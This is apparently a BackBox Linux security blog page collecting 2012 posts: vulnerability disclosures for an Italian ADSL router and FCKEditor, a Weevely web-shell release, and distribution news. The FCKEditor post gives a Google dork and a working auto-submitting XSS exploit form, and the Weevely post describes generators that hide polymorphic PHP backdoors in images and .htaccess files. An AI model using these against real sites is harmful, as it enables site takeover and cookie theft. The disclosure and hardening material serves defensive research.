
BackBox Blog

Keep up to date with the latest announcements, news, releases and updates.

Alice Gate AGPF: CSRF reconfiguration vulnerability

September 2, 2012/in News

Emilio Pinna, a BackBox community member, discovered a high-severity vulnerability in the Telecom ADSL router Alice Gate VoIP 2 Plus Wi-Fi.

A huge number of Italian ADSL broadband users are vulnerable to connection wiretapping and phishing. The most widely distributed Italian ADSL router, the Alice Gate 2 Plus Voip Wi-Fi (AGPF), produced by Pirelli and based on the openrg middleware software, is vulnerable to a CSRF attack that allows an attacker to modify a vulnerable user's internal router configuration, such as DNS servers, traffic routing, VoIP configuration, DHCP parameters, etc., leading to a complete takeover of the user's ADSL connection. The technique can also be used to enable hidden features and the telnet/ftp/tftp/web extended admin interface.

More info on official blog.


Weevely v0.7 released!

July 10, 2012/in News

Weevely returns with improved stability and usability, and with some delicious network features useful during your penetration testing or simple web shell management.

To download it, go to the official page, or simply upgrade your BackBox and start using it with the quick tutorial.

New modules

Here are the new modules you’ll get with the 0.7 release:

  • net.proxy module forwards your HTTP traffic through the remote target machine as a real proxy. First run :net.proxy, then set 'http://localhost:8080' as the HTTP proxy in your favourite web browser and browse anonymously through the target web server.
  • net.php_proxy module installs a PHP script to browse anonymously through the remote target machine.
  • net.scan module performs a port scan from your target web server.
  • file.rm module removes files and directories, also in restricted PHP environments.

The new network modules are also useful for pivoting to internal hosts unreachable from public networks. Read here for a detailed description of the modules.

Generators

Also, I’ve added new generator modules to generate different kinds of backdoors:

  • generate.php generates an obfuscated and polymorphic PHP backdoor. It is the default generator, included in older versions too.
  • generate.img appends a polymorphic PHP backdoor to an existing image and creates the associated .htaccess to enable its execution as PHP code.
  • generate.htaccess embeds a polymorphic PHP backdoor into a valid .htaccess that instructs Apache to execute the file itself as a PHP script. Awesome.

Read here about generators usage.


Talk @ HTML.it Release Party

June 22, 2012/in News

Raffaele Forte will be a speaker at the event organized by HTML.it in Rome on July 2.

The founder of the BackBox Linux project will speak on application security with a talk titled “CMS, Analisi automatica delle vulnerabilità” (“CMS: automated vulnerability analysis”).

A vulnerable CMS can allow an attacker to take full control of the site (blog, forum, e-commerce, etc.), making it possible to modify content, create and remove users and, in the worst case, even gain control of the server it is installed on. More and more companies and public institutions are adopting these tools, but what are the advantages, and what level of security do current CMSs guarantee? We will address these topics using methodologies and automated tools for vulnerability assessment.

More information is available on the event's official website.


FCKEditor reflected XSS vulnerability

June 22, 2012/in News

Emilio Pinna has recently found a reflected POST XSS in a popular web WYSIWYG editor called FCKEditor. In 2009 it was rewritten and fixed under the new name CKEditor, but the old version is still popular as a stand-alone application, as WordPress/Joomla/Drupal extensions, and embedded as the editor in web applications.

The bugged software was distributed for more than six years, and Google currently still counts more than 1.5 billion results. A plausible Google dork filtering out PHP sources could be:

inurl:fck_spellerpages/spellerpages/server-scripts/ -"The following variables"

The vulnerability

The reflected XSS is injected through the ‘textinputs’ POST parameter array, which is printed without sanitization on line 27:

echo "textinputs[$key] = decodeURIComponent(\"" . $val . "\");\n";

As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in the browser session of a visiting user, resulting in cookie theft and bypass of admin access controls. The exploit is CSRF-like because the vulnerable parameter is sent via POST. Form exploit:

<html>
<body>
<iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe>
  <form method="post" name="sender"
   action="http://vuln.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/
spellchecker.php" target="hidden">
   <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");
</script><!--' />
  </form>
</body>
<script>document.sender.submit(); </script>
</html>

Have fun!
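
The unescaped echo from line 27 next to one way to harden it, as an added example that is not FCKEditor or CKEditor project code. The helper names `emit_vulnerable` and `emit_hardened` and the sample array are assumptions made for illustration.

```php
<?php
// Added example, not project code.
// Constructed input: what PHP would hold in $_POST['textinputs'] for the
// form shown above, plus one legitimate percent-encoded value.
$textinputs = array(
    0 => 'hello%20world',
    1 => "\");alert(\"THIS SITE IS XSS VULNERABLE!\");\n</script><!--",
);

// Pattern from the post: $val lands inside a JavaScript string literal with
// no escaping, so a double quote ends the string and </script> ends the
// script element.
function emit_vulnerable($key, $val) {
    return "textinputs[$key] = decodeURIComponent(\"" . $val . "\");\n";
}

// Hardened form (hypothetical helper): force the key to an integer and let
// json_encode() build the JavaScript string literal. The JSON_HEX_* flags
// turn <, >, &, ' and " into \uXXXX escapes, so the value can close neither
// the string nor the surrounding <script> block.
function emit_hardened($key, $val) {
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $literal = json_encode((string) $val, $flags);
    if (!is_string($literal)) {
        $literal = '""';  // encoding failed (e.g. invalid UTF-8): emit empty
    }
    return 'textinputs[' . (int) $key . '] = decodeURIComponent('
        . $literal . ");\n";
}

foreach ($textinputs as $key => $val) {
    if (!is_string($val)) {
        continue;  // textinputs[][]=... arrives as a nested array; skip it
    }
    echo "vulnerable: ", emit_vulnerable($key, $val);
    echo "hardened:   ", emit_hardened($key, $val);
}
```

In the hardened output the payload stays inside a single quoted literal, with its quotes and angle brackets rendered as `\u0022`, `\u003C` and `\u003E`.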


GRUB error being fixed on BackBox 64 bit version

April 29, 2012/in News

After the release of BackBox 2.05 we noticed that GRUB was corrupted on the ISO image of the 64-bit version. We would like to inform everyone that the error has been fixed and the new ISO image has been uploaded to our official mirrors. To avoid any problems, we invite all users to download the new ISO image. We would also like to thank the community of BackBox users for reporting this error.

Enjoy your BackBox!


BackBox Linux 2.05 released!

April 26, 2012/in Releases

The BackBox team is proud to announce release 2.05 of BackBox Linux. The new release includes features such as Ubuntu 11.04, Linux Kernel 2.6.38 and Xfce 4.8.0. The ISO images (32-bit & 64-bit) can be downloaded from the following location: https://www.backbox.org/download

What’s new

  • System upgrade
  • Bug corrections
  • Performance boost
  • Improved start menu
  • Improved WiFi driver (compat-wireless aircrack patched)
  • New Hacking tools: creepy, fern-wifi-cracker, joomscan, pyrit, reaver, xplico, etc.
  • Updated tools: crunch, fimap, hydra, magictree, metasploit, set, sipvicious, skipfish, w3af, weevely, wireshark, wirouterkeyrec, wpscan, zaproxy, theharvester, xsser, etc.

System requirements

  • 32-bit or 64-bit processor
  • 256 MB of system memory (RAM)
  • 4.4 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port